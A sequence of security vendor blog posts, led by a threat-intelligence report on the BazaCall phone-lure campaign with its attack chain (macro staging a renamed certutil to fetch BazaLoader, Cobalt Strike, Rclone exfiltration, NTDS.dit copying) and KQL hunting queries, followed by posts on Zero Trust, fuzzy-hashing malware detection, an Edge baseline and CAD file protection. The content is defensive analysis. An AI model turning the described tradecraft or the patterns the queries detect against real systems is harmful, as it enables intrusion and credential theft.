Figure 2. A typical BazaCall email, claiming that the user’s trial for a photo editing service will soon expire, and that they will be automatically charged. A fake customer service number is provided to help cancel the subscription.

Each BazaCall email is sent from a different sender, typically using free email services and likely compromised email addresses. The lures within the email use fake business names that are similar to the names of real businesses. A recipient who searches the business name online to check the email’s legitimacy may be led to believe that such a company exists and that the message they received has merit.

Some sample subject lines are listed below. They each have a unique “account number” created by the attackers to identify the recipients:

  • Soon you’ll be moved to the Premium membership, as the demo period is ending. Personal ID: KT[unique ID number]
  • Automated premium membership renewal notice GW[unique ID number] 👵
  • Your demo stage is nearly ended. Your user account number VC[unique ID number]. All set to continue?
  • Notification of an abandoned road accident site! Must to get hold of a manager! [body of email contains unique ID number]
  • Thanks for deciding to become a member of BooyaFitness. Fitness program was never simpler before [body of email contains unique ID number]
  • Your subscription will be changed to the gold membership, as the trial is ending. Order: KT[unique ID number]
  • Your free period is almost ended. Your member’s account number VC[unique ID number]. Ready to move forward?
  • Thank you for getting WinRAR pro plan. Your order # is WR[unique ID number].
  • Many thanks for choosing WinRAR. You need to check out the information about your licenses [body of email contains unique ID number]

While the subject lines in most of the observed campaigns contain similar keywords and occasional emojis, each one is unique because it includes an alphanumeric sequence specific to the recipient. This sequence is always presented as a user ID or transaction code, but it actually serves as a way for the attacker to identify the recipient and track the latter’s responses to the campaign. The unique ID numbers largely follow the same pattern, which the regular expression [A-Z]{1,3}(?:\d{9,15}) can surface, for example, L0123456789 and KT01234567891.
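To make the pattern concrete, here is a small, illustrative Python check using that same regular expression; the sample subjects below are shaped like the real lures but the IDs are made up:

```python
import re

# Pattern described above: 1-3 uppercase letters followed by 9-15 digits.
UNIQUE_ID = re.compile(r"[A-Z]{1,3}\d{9,15}")

subjects = [
    "Your demo stage is nearly ended. Your user account number VC0123456789.",
    "Automated premium membership renewal notice GW012345678912",
    "Quarterly report attached",  # benign subject, no tracking code
]

for subject in subjects:
    match = UNIQUE_ID.search(subject)
    print(match.group(0) if match else "no unique ID")
```

Running this surfaces `VC0123456789` and `GW012345678912` while the benign subject yields no match, which is the intuition behind the email hunting query later in this post.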

In one recent BazaCall campaign, the unique ID was present in the body of the email, but not in the subject line:

Figure 3. A recent BazaCall email with the unique ID present only in the message body.

If a target recipient does decide to call the phone number indicated in the email, they will speak with a real person from a fraudulent call center set up by BazaCall’s operators. The call center agent serves as a conduit to the next phase of the attack: during their conversation, an agent tells the caller they can help cancel the supposed subscription or transaction. To do so, the agent asks the caller to visit a website.

These websites are designed to look like legitimate businesses, some of which even impersonate actual companies. However, we have noted that some domain names do not always match the name of the fictitious business included in the email. For example, an email claiming that a user’s free trial for “Pre Pear Cooking” was set to expire was paired with the domain, “topcooks[.]us”.

Figure 4. A sample website used in the BazaCall campaign. It mimics a real recipe website but is attacker-controlled.

The call center agent then instructs the user to navigate to the account page and download a file to cancel their subscription. The file is a macro-enabled Excel document with names such as “cancel_sub_[unique ID number].xlsb.” Note that in some instances, we observed that even when security filters such as Microsoft Defender SmartScreen are enabled, users intentionally bypass them to download the file, which indicates that the call center agent is likely instructing the user to circumvent security warnings under the threat that their credit cards will be charged if they don’t. Again, this demonstrates the effectiveness of the social engineering tactics used in BazaCall attacks.

The downloaded Excel file displays a fake notification that it is protected by Microsoft Office. The call center agent then instructs the user to click on the button that enables editing and content (macros) to view the spreadsheet’s contents. If the user enables the macro, BazaLoader malware is delivered to the device.

Figure 5. An Excel document used by the attackers, prompting the user to enable malicious code.

Hands-on-keyboard control for selective data exfiltration

The enabled macro in the Excel document creates a new folder, named with a random string of characters, in the %programdata% folder. It then copies certutil.exe, a known living-off-the-land binary (LOLBin), from the System folder into the newly created folder as a means of defense evasion. Finally, the copy of certutil.exe is renamed to match the random string of characters in the folder name.
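The staging steps above leave a distinctive command-line shape. The sketch below is a deliberately simplified, hypothetical detection heuristic in Python; the token list and the sample command line are illustrative, not actual product logic or telemetry:

```python
# Hypothetical heuristic: flag command lines that create a folder, copy
# certutil.exe into it, and stage it under a new name in one go -- the
# shape this macro produces. Real detections use much richer telemetry.
SUSPICIOUS_TOKENS = ("mkdir", "&& copy", "certutil.exe")

def looks_like_certutil_staging(command_line: str) -> bool:
    """Return True when every staging token appears in the command line."""
    lowered = command_line.lower()
    return all(token in lowered for token in SUSPICIOUS_TOKENS)

# Illustrative command line shaped like the macro's behavior:
sample = (
    r"cmd /c mkdir C:\ProgramData\qx2k7f && copy "
    r"C:\Windows\System32\certutil.exe C:\ProgramData\qx2k7f\qx2k7f.exe"
)
print(looks_like_certutil_staging(sample))         # True
print(looks_like_certutil_staging("notepad.exe"))  # False
```

The same `mkdir` / `&& copy` / `certutil.exe` combination appears in the Excel file execution hunting query near the end of this post.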

The macro then uses the newly renamed copy of certutil.exe to connect to the attacker infrastructure and download BazaLoader. This downloaded payload is a malicious dynamic-link library (.dll) and is loaded by rundll32.exe. Rundll32 then injects into a legitimate MsEdge.exe process to connect to a BazaLoader command-and-control (C2) server and establish persistence by using Edge to create a .lnk (shortcut) file pointing to the payload in the Startup folder. The injected MsEdge.exe is also used for reconnaissance, collecting system and user information, domains on the network, and domain trusts.

The rundll32.exe process retrieves a Cobalt Strike beacon that enables the attacker to have hands-on-keyboard control of the device. Now with direct access, the attacker performs reconnaissance on the network and searches for local administrators and high-privilege domain administrator account information.

The attacker also conducts further extensive reconnaissance using ADFind, a free command-line tool designed for Active Directory discovery. Often, information gathered from this reconnaissance is saved to a text file and viewed by the attacker using the “Type” command in the command prompt.

Once the attacker has established a list of target devices on the network, they use Cobalt Strike’s custom, built-in PsExec functionality to move laterally to the targets. Each device the attacker lands on establishes a connection to the Cobalt Strike C2 server. Additionally, certain devices are used for additional reconnaissance by downloading open-source tools designed to steal browser passwords. In some instances, the attackers also used WMIC to move laterally to high-value targets, such as Domain Controllers.

When the attacker lands on a selected high-value target, they use 7-Zip to archive intellectual property for exfiltration. The archived files are named after the type of data they contain, such as IT information, or information about security operations, finance and budgeting, and details specific to each target’s industry. The attacker then uses a renamed version of the open-source tool, RClone, to exfiltrate these archives to an attacker-controlled domain.

Figure 6. Post-compromise activity on the target, including exfiltration and ransomware.

Finally, on domain controller devices, the attacker uses NTDSUtil.exe—a legitimate tool typically used to create and maintain the Active Directory database—to create a copy of the NTDS.dit Active Directory database, in either the %programdata% or %temp% folders, for subsequent exfiltration. NTDS.dit contains user information and password hashes for all users in the domain.

In some instances, data exfiltration appeared to be the primary objective of the attack, which would typically be in preparation for future activity. However, in other instances, the attacker deploys ransomware after conducting the previously described activity. In those cases where ransomware was dropped, the attacker used high-privilege compromised accounts in conjunction with Cobalt Strike’s PsExec functionality to drop a Ryuk or Conti ransomware payload onto network devices.

Detecting BazaCall through cross-domain visibility and threat intelligence

While many cybersecurity threats rely on automated, drive-by tactics (for example, exploiting system vulnerabilities to drop malware or compromising legitimate websites for a watering hole attack) or develop advanced detection evasion methods, attackers continue to find success in social engineering and human interaction in attacks. The BazaCall campaign replaces links and attachments with phone numbers in the emails it sends out, posing challenges in detection, especially by traditional antispam and anti-phishing solutions that check for those malicious indicators.

The lack of typical malicious elements in BazaCall’s emails and the speed with which their operators can conduct an attack exemplify the increasingly complex and evasive threats that organizations face today. Microsoft 365 Defender provides the cross-domain visibility and coordinated defense to protect customers against such threats. The ability to correlate events across endpoints and emails is crucial in the case of BazaCall, given its distinct characteristics. Microsoft Defender for Endpoint detects implants such as BazaLoader and Cobalt Strike, payloads such as Conti and Ryuk, and subsequent attacker behavior. These endpoint signals are correlated with email threat data, informing Microsoft Defender for Office 365 to block the BazaCall emails, even if these emails don’t have the typical malicious artifacts.

Microsoft 365 Defender further enables organizations to defend against this threat through rich investigations tools like advanced hunting, allowing security teams to locate related or similar activities and seamlessly resolve them.


Justin Carroll and Emily Hacker

Microsoft 365 Defender Threat Intelligence Team


Advanced hunting queries

The following advanced hunting queries are accurate as of the time this blog was published. For the most up-to-date queries, please visit

To locate possible exploitation activity, run the following queries in the Microsoft 365 Defender portal.

BazaCall emails

To look for malicious emails matching the patterns of the BazaCall campaign, run this query.

EmailEvents
| where Subject matches regex @"[A-Z]{1,3}\d{9,15}"
    and Subject has_any('trial', 'free', 'demo', 'membership', 'premium', 'gold',
    'notification', 'notice', 'claim', 'order', 'license', 'licenses')

BazaCall Excel file delivery

To look for signs of web file delivery behavior matching the patterns of the BazaCall campaign, run this query.

DeviceFileEvents
| where (FileOriginUrl has "/cancel.php" and FileOriginReferrerUrl has "/account")
    or (FileOriginUrl has "/download.php" and FileOriginReferrerUrl has "/case")

BazaCall Excel file execution

To surface the execution of malicious Excel files associated with BazaCall, run this query.

DeviceProcessEvents
| where InitiatingProcessFileName =~ "excel.exe"
    and ProcessCommandLine has_all('mkdir', '&& copy', 'certutil.exe')

BazaCall Excel file download domain pattern

To look for malicious Excel files downloaded from .XYZ domains, run this query.

DeviceNetworkEvents
| where RemoteUrl matches regex @".{14}\.xyz/config\.php"

BazaCall dropping payload via certutil

To look for the copy of certutil.exe that was used to download the BazaLoader payload, run this query.

// Source table assumed: the renamed certutil copy initiates the download connection.
DeviceNetworkEvents
| where InitiatingProcessFileName !~ "certutil.exe"
| where InitiatingProcessFileName !~ "cmd.exe"
| where InitiatingProcessCommandLine has_all("-urlcache", "split", "http")

NTDS theft

To look for theft of Active Directory in paths used by this threat, run this query.

DeviceProcessEvents
| where FileName =~ "ntdsutil.exe"
| where ProcessCommandLine has_any("full", "fu")
| where ProcessCommandLine has_any("temp", "perflogs", "programdata")
// Exclusion
| where ProcessCommandLine !contains @"Backup"

Renamed Rclone data exfiltration

To look for data exfiltration using renamed Rclone, run this query.

DeviceProcessEvents
| where ProcessVersionInfoProductName has "rclone" and not(FileName has "rclone")

RunDLL Suspicious Network Connections

To look for RunDLL making suspicious network connections, run this query.

DeviceNetworkEvents
| where InitiatingProcessFileName =~ 'rundll32.exe' and InitiatingProcessCommandLine has ",GlobalOut"


Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.


Zero Trust Adoption Report: How does your organization compare?

July 28th, 2021

From the wide adoption of cloud-based services to the proliferation of mobile devices, and from the emergence of advanced new cyberthreats to the recent sudden shift to remote work, the last decade has been full of disruptions that have required organizations to adapt and accelerate their security transformation. And as we look forward to the next major disruption—the move to hybrid work—one thing is clear: the pace of change isn’t slowing down.

In the face of this rapid change, Zero Trust has risen as a guiding cybersecurity strategy for organizations around the globe. A Zero Trust security model assumes breach and explicitly verifies the security status of identity, endpoint, network, and other resources based on all available signals and data. It relies on contextual real-time policy enforcement to achieve least privileged access and minimize risks. Automation and machine learning are used to enable rapid detection, prevention, and remediation of attacks using behavior analytics and large datasets.
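The model described above can be caricatured in code. The following is a rough conceptual sketch only, not any product’s actual policy engine; the signal names and risk thresholds are invented for illustration:

```python
from dataclasses import dataclass

@dataclass
class AccessSignals:
    """Signals evaluated on every request; nothing is trusted by default."""
    identity_verified: bool  # e.g., strong authentication succeeded
    device_compliant: bool   # endpoint meets the security baseline
    risk_score: float        # 0.0 (low) to 1.0 (high), from behavior analytics

def evaluate_access(signals: AccessSignals) -> str:
    """Explicitly verify every signal; assume breach; grant least privilege."""
    if not signals.identity_verified:
        return "deny"
    if signals.risk_score >= 0.7:
        return "deny"                    # high risk: block outright
    if not signals.device_compliant or signals.risk_score >= 0.3:
        return "require_mfa"             # medium risk: step-up verification
    return "allow_least_privilege"       # low risk: scoped access only

print(evaluate_access(AccessSignals(True, True, 0.1)))   # allow_least_privilege
print(evaluate_access(AccessSignals(True, False, 0.1)))  # require_mfa
print(evaluate_access(AccessSignals(False, True, 0.0)))  # deny
```

The point of the sketch is the shape of the decision: every request is re-evaluated against all available signals, and even a successful outcome grants only least-privileged, scoped access.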

Early adopters are seeing the benefits—organizations operating with a Zero Trust mindset across their environments are more resilient, responsive, and protected than those with traditional perimeter-based security models.

Zero Trust adoption is accelerating

Today, we are publishing our Zero Trust Adoption Report 2021. In this report, we surveyed or interviewed more than 1,200 security decision-makers over a 12-month timeframe about their Zero Trust adoption journey. Highlights from our research include:

Zero Trust Adoption Report cover image with three overlapping colored circles.

  1. Zero Trust is now the top security priority. 96 percent of security decision-makers state that Zero Trust is critical to their organization’s success. Now that it’s been proven, the future of security firmly includes an emphasis on Zero Trust. When asked for the top reasons for adopting Zero Trust, organizations cite increased security and compliance agility, speed of threat detection and remediation, and simplicity and availability of security analytics.
  2. Familiarity and adoption are growing rapidly. 90 percent of the security decision-makers we surveyed are familiar with Zero Trust and 76 percent are in the process of implementation—up 20 percent and 6 percent, respectively, from last year.
  3. Hybrid work is driving adoption. The shift to hybrid work, accelerated by COVID-19, is also driving the move towards broader adoption of Zero Trust with 81 percent of organizations having already begun the move toward a hybrid workplace. Zero Trust will be critical to help maintain security amid the IT complexity that comes with hybrid work.
  4. More than half believe they’re ahead of their peers. 52 percent say that they are ahead of where they planned to be in their Zero Trust adoption, and 57 percent believe they are ahead of other organizations. It’s clear that the last 18 months have had a significant impact on adoption and organizations are getting more confident and efficient in their efforts.
  5. Zero Trust will remain a top priority with additional budget expected. More than half of respondents expect the relative importance of their Zero Trust strategy to increase by 2023. And not surprisingly, 73 percent expect their Zero Trust budget to increase. As organizations realize the additional benefits of Zero Trust and leaders continue to pull ahead, we expect to see an increase in these numbers.

This report showcases the Zero Trust adoption progress for organizations across diverse markets and industries. We hope that this research can help you accelerate your own Zero Trust adoption strategy, uncover the collective progress and prioritizations of your peers, and gain insights into the future state of this rapidly evolving space.

Read the full Microsoft Zero Trust Adoption Report for full details.

Additional resources

For an in-depth look at our latest updates that will help accelerate your Zero Trust journey, check out Vasu Jakkal’s blog, How to secure your hybrid work world with a Zero Trust approach, from earlier this month.

For technical guidance, visit our Zero Trust Guidance Center, a repository of information that provides specific guidance on implementing Zero Trust principles across their identities, endpoints, data, applications, networks, and infrastructure.

Check out the Microsoft Zero Trust Assessment tool to help you determine where you are in your Zero Trust implementation journey and offer action items to help reach key milestones.

For more information about Microsoft Zero Trust, please visit our website, and check out our deployment guides for step-by-step technical guidance.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.



Combing through the fuzz: Using fuzzy hashing and deep learning to counter malware detection evasion techniques

July 27th, 2021

Today’s cybersecurity threats continue to find ways to fly and stay under the radar. Cybercriminals use polymorphic malware because a slight change in the binary code or script could allow the said threats to avoid detection by traditional antivirus software. Threat actors customize their wares specific to their target organizations to increase their chances of breaking into and moving laterally through an entire corporate network, exfiltrating data, and leaving with little or no trace. The underground economy is rife with malware builders, Trojanized versions of legitimate applications, and other tools and services that allow malware operators to deploy highly evasive malware.

As the number of threats seen in the wild continues to increase exponentially, the continued evolution and innovation of their evasion tactics create a scenario where most malware is seen only once. Therefore, in today’s threat landscape, security solutions should no longer be just about the number of unique malware they can detect. Instead, they should deliver durable solutions that can defend against existing as well as future attacks. This requires comprehensive visibility into threats, coupled with the ability to process vast amounts of data. Microsoft 365 Defender provides such a capability using its cross-domain optics and the transformation of data into actionable security information through innovative applications of AI and machine learning methodologies.

We have previously discussed how we apply deep learning in detecting malicious PowerShell, exploring new approaches to classify malware, and in detecting threats via the fusion of behavior signals. In this blog post, we discuss a new approach that combines deep learning with fuzzy hashing. This approach utilizes fuzzy hashes as input to identify similarities among files and to determine if a sample is malicious or not. Then, a deep learning methodology inspired by natural language processing (NLP) better identifies similarities that actually matter, thus improving detection quality and scale of deployment.

This model aims to improve the overall accuracy of classifying malware and continue closing the gap between malware release and eventual detection. It can detect and block malware at first sight, a critical capability in defending against the wide range of threats, including sophisticated cyberattacks.

Case study: New NOBELIUM-related malware blocked at first sight

In March this year, Microsoft 365 Defender successfully blocked a file that would later be confirmed as a variant of the GoldMax malware. GoldMax, a command-and-control backdoor that persists on networks as a scheduled task impersonating systems management software, is part of the tools, tactics, and procedures (TTPs) of NOBELIUM, the threat actor behind the attacks against SolarWinds in December 2020.

Microsoft was able to proactively defend its customers from this newly discovered GoldMax variant because it leveraged two main technologies: fuzzy hashing, which serves as the input, and deep learning techniques inspired by NLP and computer vision, among others.

The earliest GoldMax sample, which Microsoft detects as Trojan:Win64/GoldMax.A!dha, was first submitted to VirusTotal in September 2020. While the new file was confirmed to be a GoldMax variant only in June 2021, three months after Microsoft first blocked it, we started defending customers as soon as we saw it. As seen in the screenshots below, the new file’s TLSH and SSDEEP hashes—the fuzzy hashes exposed on VirusTotal—are observably similar to those of the first GoldMax variant. Both files also have the exact same ImpHash and file size, further supporting our initial conclusion that the second file is also part of the GoldMax family.

Screenshots showing file properties of the original GoldMax malware and the new variant

Figure 1. File properties of the first GoldMax variant (top) and the new file detected in March (bottom) (from VirusTotal)

In the next sections, we discuss fuzzy hashes and how we use them in conjunction with deep learning to detect new and unknown threats.

Understanding fuzzy hashes

Hashing has become an essential technique in malware research literature and beyond because its outputs—hashes—are commonly used as checksums or unique identifiers. For example, it is common practice to use a SHA-256 cryptographic hash to query a knowledge database like VirusTotal to determine whether a file is malicious. The first antivirus products operated this way before antivirus signatures existed.
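For reference, computing the SHA-256 digest used for such lookups is a one-liner with Python's standard library; the lookup URL in the comment is VirusTotal's v3 file endpoint:

```python
import hashlib

def sha256_digest(data: bytes) -> str:
    """SHA-256 of a file's contents: the usual key for reputation lookups."""
    return hashlib.sha256(data).hexdigest()

# Known test vector: the SHA-256 of empty input.
digest = sha256_digest(b"")
print(digest)  # e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

# A reputation lookup would then query, for example:
#   GET https://www.virustotal.com/api/v3/files/<digest>
```

In practice the digest is computed over the whole file read in binary mode, chunk by chunk for large files.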

However, traditional cryptographic hashing poses a challenge for identifying or detecting similar malware because of an inherent property called cryptographic diffusion, whose purpose is to hide the relationship between the original entity and the hash so that hashes remain one-way functions. With this property, even a minimal change in the original entity—in this case, a file—yields a radically different, unrelated hash.

Below are screenshots that illustrate this principle. The one-word change in the text file and the resulting change in the MD5 hash represent the effect of changes in the binary content of other file types:

Screenshots of two text files opened in Notepad showing a minor difference in text and comparing their MD5 hashes

Figure 2. Example of cryptographic hashing
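The effect in Figure 2 is easy to reproduce with Python's standard library; a one-letter change produces a completely unrelated MD5 digest (the inputs here are the classic test-vector sentences, not the files from the screenshot):

```python
import hashlib

text_a = b"The quick brown fox jumps over the lazy dog"
text_b = b"The quick brown fox jumps over the lazy cog"  # one letter changed

digest_a = hashlib.md5(text_a).hexdigest()
digest_b = hashlib.md5(text_b).hexdigest()

# Cryptographic diffusion: the two digests share no observable relationship.
print(digest_a)  # 9e107d9d372bb6826bd81d3542a419d6
print(digest_b)
```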

Fuzzy hashing breaks the aforementioned cryptographic diffusion while still hiding the relationship between entity and hash. In doing so, this method provides similar resulting hashes when given similar inputs. Fuzzy hashing is the key to finding new malware that looks like something we have seen previously.

As with cryptographic hashes, there are several algorithms for calculating a fuzzy hash; examples include Nilsimsa, TLSH, SSDEEP, and sdhash. Using the text files from the previous example, below is a screenshot of their SSDEEP hashes. Note how observably similar these hashes are because there is only a one-word difference in the text:

Screenshot of Windows PowerShell showing fuzzy hashing for two text files

Figure 3. Example of fuzzy hashing

The main benefit of fuzzy hashes is similarity. Since these hashes can be calculated on several parts or the entirety of a file, we can focus on hash sequences that are like one another. This is important in determining the maliciousness of a previously undetected file and in categorizing malware according to type, family, malicious behavior, or even related threat actor.
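To make "similar inputs yield similar hashes" concrete, here is a deliberately naive sketch, not SSDEEP itself (real context-triggered piecewise hashing picks chunk boundaries with a rolling hash so that insertions shift only one segment): hash fixed-size chunks independently and compare the resulting segment lists.

```python
import hashlib

def piecewise_hash(data: bytes, chunk_size: int = 16) -> list[str]:
    """Naive piecewise hash: one short digest per fixed-size chunk."""
    return [
        hashlib.sha256(data[i:i + chunk_size]).hexdigest()[:8]
        for i in range(0, len(data), chunk_size)
    ]

def similarity(h1: list[str], h2: list[str]) -> float:
    """Fraction of hash segments that match between two files."""
    matches = sum(s1 == s2 for s1, s2 in zip(h1, h2))
    return matches / max(len(h1), len(h2))

file_a = b"This is an example of our sample text file for fuzzy hashing."
file_b = b"This is an example of our sample text file for fuzzy hashing!"

# Only the chunk containing the changed byte differs; the rest still match.
print(similarity(piecewise_hash(file_a), piecewise_hash(file_b)))  # 0.75
```

A cryptographic hash of the same two inputs would match on zero segments; the piecewise scheme preserves the similarity signal that classification relies on.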

Fuzzy hashes as “natural language” for deep learning

Deep learning in its many applications has recently been remarkable at modeling natural human language. For example, convolutional architectures, recurrent architectures like Gated Recurrent Units (GRUs) and Long Short-Term Memory networks (LSTMs), and most recently attention-based networks like the many variants of Transformers have proven to be state-of-the-art in tackling human language tasks like sentiment analysis, question answering, and machine translation. As such, we explored whether similar techniques could be applied to computer languages like binary code, with fuzzy hashing as an intermediate step to reduce the sequence complexity and length of the original space. We discovered that segments of fuzzy hashes could be treated as “words,” and some sequences of such words could indicate maliciousness.
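As an illustration of the “words” idea, a fuzzy hash can be tokenized into overlapping character n-grams per segment. The hash value below is fabricated for the example; real SSDEEP output has the form blocksize:hash1:hash2.

```python
def tokenize_fuzzy_hash(fuzzy_hash: str, ngram: int = 3) -> list[str]:
    """Split each colon-separated hash segment into overlapping n-gram 'words'."""
    tokens = []
    for segment in fuzzy_hash.split(":"):
        tokens.extend(segment[i:i + ngram] for i in range(len(segment) - ngram + 1))
    return tokens

# Fabricated SSDEEP-style value, for illustration only.
tokens = tokenize_fuzzy_hash("96:s4Ud1Lj3:FQv")
print(tokens)
```

Files with similar content share many of these tokens, which is exactly the property a language model can exploit.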

Architecture overview and deployment at scale

A common deep learning approach in dealing with words is to use word embeddings. However, because fuzzy hashes are not exactly natural language, we could not simply use pre-trained models. Instead, we needed to train our embeddings from scratch to identify malicious indicators.

Once we had these embeddings, we approached the problem much as we would any language task with a deep neural network. We explored different architectures using standard techniques from the literature: convolutions over these embeddings, multilayer perceptrons, traditional sequential models (like the previously mentioned LSTM and GRU), and attention-based networks (Transformers).

Diagram showing architecture of fuzzy hashing model

Figure 4. Architecture overview of the deep learning model using fuzzy hashes

We got fairly good results with most techniques. However, to deploy and enable this model in Microsoft 365 Defender, we also had to consider factors like inference time and the number of parameters in the network. Inference time ruled out the sequential models: even though they were the best in terms of precision and recall, they were the slowest to run inference on. Meanwhile, the Transformers we experimented on also yielded excellent results but had several million parameters, which would be too costly to deploy at scale.

That left us with the convolutional approach and the multilayer perceptron. Of these two, the perceptron yielded slightly better results, because the spatial adjacency intrinsically assumed by the convolutional filters does not properly capture the relationship among the embeddings.
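A minimal NumPy sketch of that final embeddings-plus-perceptron shape (all dimensions, the mean pooling, and the random initialization are illustrative assumptions, not the production model):

```python
import numpy as np

rng = np.random.default_rng(0)

VOCAB_SIZE, EMBED_DIM, HIDDEN_DIM = 1000, 32, 16

# Randomly initialized here; in practice these are trained from scratch.
embeddings = rng.normal(size=(VOCAB_SIZE, EMBED_DIM))
W1 = rng.normal(size=(EMBED_DIM, HIDDEN_DIM))
W2 = rng.normal(size=(HIDDEN_DIM, 1))

def predict(token_ids: list[int]) -> float:
    """Embed fuzzy-hash 'words', mean-pool, and score with a small MLP."""
    pooled = embeddings[token_ids].mean(axis=0)   # (EMBED_DIM,)
    hidden = np.maximum(pooled @ W1, 0)           # ReLU
    logit = hidden @ W2                           # (1,)
    return float(1 / (1 + np.exp(-logit[0])))     # maliciousness probability

# Hypothetical token IDs produced by a fuzzy-hash tokenizer.
score = predict([17, 512, 33, 908])
print(round(score, 3))
```

Because there is no recurrence or attention, inference is a handful of matrix multiplications, which is what makes this architecture cheap to run at scale.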

Once we had landed on a viable architecture, we used modern tools available to us that Microsoft continues to extend. We used Azure Machine Learning GPU capabilities to train these models at scale, then exported them to Open Neural Network Exchange (ONNX), which gave us the extra performance we needed to operationalize this at scale on Microsoft Defender Cloud.

Deep learning fuzzy hashes: Looking for the similarities that matter

A question that arises from an approach like this is: why use deep learning at all?

Adding machine learning allows us to learn which similarities on fuzzy hashes matter and which ones don’t. Additionally, adding deep learning and training on vast amounts of data increases the accuracy of malware classification and allows us to understand the minor nuances that differentiate legitimate software from its malware or Trojanized versions.

A deep learning approach also has its inherent benefits, one of which is the ability to pre-train large models on massive amounts of data. One can then reuse such a pre-trained model for different classification, clustering, and other scenarios through transfer learning. This is similar to how modern NLP approaches language tasks, like how OpenAI’s GPT-3 solves question answering.

Another inherent benefit of deep learning is that one does not have to retrain the model from scratch. Since new data is constantly flowing into the Microsoft Defender Cloud, we can fine-tune the model with this incoming data to adapt and quickly respond to an ever-changing threat landscape.

Conclusion: Continuing to harness the immense potential of deep learning in security

Deep learning continues to provide opportunities to improve threat detection significantly. The deep learning approach discussed in this blog entry is just one of the ways we at Microsoft apply deep learning in our protection technologies to detect and block evasive threats. Data scientists, threat experts, and product teams work together to build AI-driven solutions and investigation experiences.

By treating fuzzy hashes as “words” and not mere codes, we proved that natural language techniques in deep learning are viable methods to solve the current challenges in the threat landscape. This change in perspective presents different possibilities in cybersecurity innovation that we are looking forward to exploring further.

Numerous AI-driven technologies like this allow Microsoft 365 Defender to automatically analyze massive amounts of data and quickly identify malware and other threats. As the GoldMax case study showed, the ability to identify new and unknown malware is a critical aspect of the coordinated defense that Microsoft 365 Defender delivers to protect customers against the most sophisticated threats.

Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft 365 Defender.


Edir Garcia Lazo

Microsoft 365 Defender Research Team

The post Combing through the fuzz: Using fuzzy hashing and deep learning to counter malware detection evasion techniques appeared first on Microsoft Security Blog.

Security baseline for Microsoft Edge v92

July 26th, 2021 No comments

We are pleased to announce the enterprise-ready release of the security baseline for Microsoft Edge version 92!


We have reviewed the settings in Microsoft Edge version 92 and updated our guidance with the addition of 3 settings and the removal of 1 setting. A new Microsoft Edge security baseline package was just released to the Download Center. You can download the new package from the Security Compliance Toolkit.



Specifies whether SharedArrayBuffers can be used in a non cross-origin-isolated context

To prevent cross-origin data theft, JavaScript SharedArrayBuffers can only be used from cross-origin-isolated contexts. To maintain proper cross-origin security, this policy should not be used to relax the isolation restriction. The security baseline has prohibited this and configured this setting to Disabled.



Allow unconfigured sites to be reloaded in Internet Explorer mode

When it comes to security, administrators are the experts. Allowing an end-user to relax their security posture without awareness of the implications doesn’t usually end well, especially when attackers can use social-engineering techniques to trick users into making unsafe choices. Therefore, the security baseline forbids allowing end-users to open arbitrary websites in IE mode.


NOTE: If your enterprise has legacy sites that still require IE mode, you should configure them using the IE mode policies outlined here.



Specifies whether to allow insecure websites to make requests to more-private network endpoints

Allowing public internet sites to “peek” behind your firewall by using the user’s browser to mix intranet resources into internet-delivered pages represents a dangerous attack surface, and browsers are beginning to introduce restrictions upon such architectures. The baseline requires enforcement of the new browser restriction that any such intranet requests are blocked if the internet page was delivered over insecure HTTP.


NOTE: If for some reason you need to permit insecure cross-network requests for legacy sites, you can configure temporary exceptions in ‘Allow the listed sites to make requests to more-private network endpoints from insecure contexts’



Allow certificates signed using SHA-1 when issued by local trust anchors

As we communicated in the version 85 release, this setting was temporary and served as a bridge for organizations. We have removed this setting from the baseline because it is now considered obsolete; there is no longer any supported mechanism to allow SHA-1, even for certificates issued by your non-public Certificate Authorities.



Microsoft Edge version 92 introduced 11 new computer settings and 11 new user settings. We have included a spreadsheet in the release to make it easier for you to find them.


As a friendly reminder, all available settings for Microsoft Edge are documented here, and all available settings for Microsoft Edge Update are documented here.


Please continue to give us feedback through the Security Baseline Community or this post.

Categories: Uncategorized

How to protect your CAD data files with MIP and HALOCAD

July 22nd, 2021 No comments

This blog post is part of the Microsoft Intelligent Security Association guest blog series. Learn more about MISA.

Computer-aided design (CAD) files are used by design professionals in the manufacturing, engineering, architecture, surveying, and construction industries. These highly valuable files contain confidential information and form their core intellectual property (IP).

Loss of such proprietary information to an outsider or a competitor can have disastrous effects, leading to lost sales, reduced market share, and lower profit margins. However, such industries often collaborate with other design partners or vendors, or share their design parts with smaller manufacturers. Product blueprints and designs are regularly exchanged, both within and outside the organization’s network boundaries. In such cases, there is a high possibility of a data leak.

Data loss or theft can occur in any one of the following ways:

  1. Every time you send a file to another person, a copy is usually made and stored online. Once the file leaves the organization, there is no guarantee that it is safe unless it is adequately protected.
  2. Copies are also made when the file is stored on or transferred to another system.
  3. A malicious insider may have a copy of the file and the ability to share the information with an outsider, even after leaving the organization.

Microsoft Information Protection works where perimeter security fails

Organizations may use encryption programs, secure file transfer protocol, and other access control methods to prevent data leaks and data theft. However, once these files leave their original repository it is very difficult to keep track of their usage.

To solve this problem, organizations have invested in Microsoft Information Protection (MIP) an intelligent, unified, and extensible solution to protect sensitive data across your enterprise—in Microsoft 365 cloud services, on-premises, third-party software as a service (SaaS) applications, and more. MIP provides a unified set of capabilities to know your data, protect your data, and help prevent data loss across Microsoft 365 apps (such as Word, PowerPoint, Excel, and Outlook) and services (such as Teams, SharePoint, and Exchange).

Microsoft Information Protection capabilities.

When you have already invested in an excellent information protection system, it isn’t prudent to adopt a second, separate one. So what can be done to solve the problem above?

MIP and HALOCAD for secured digital collaboration at a global scale

SECUDE has integrated their HALOCAD solution with Microsoft’s MIP SDK, which extends data protection beyond the organization’s IT perimeter. HALOCAD not only integrates as a MIP SDK add-in into the content authoring environment but also works as an add-on to the content repository, implementing information protection policies across supported repositories.

HALOCAD solution architectural diagram 1

With over two decades of experience in the data security field, SECUDE has a track record of extending MIP capabilities to SAP environments, especially when sensitive information is exported from them. HALOCAD seamlessly applies MIP labeling templates to CAD files, and does so simply and cost-effectively. It also applies the label within the content repositories where engineering teams store and share CAD files.

Let us look at a hypothetical scenario of how data collaboration happens between the engineering team and external third-party vendors and suppliers with HALOCAD and MIP:

HALOCAD solution architectural diagram 2

In the above scenario, the design files move seamlessly across the supply chain with MIP sensitivity labels applied automatically and user privileges as defined by the organization.

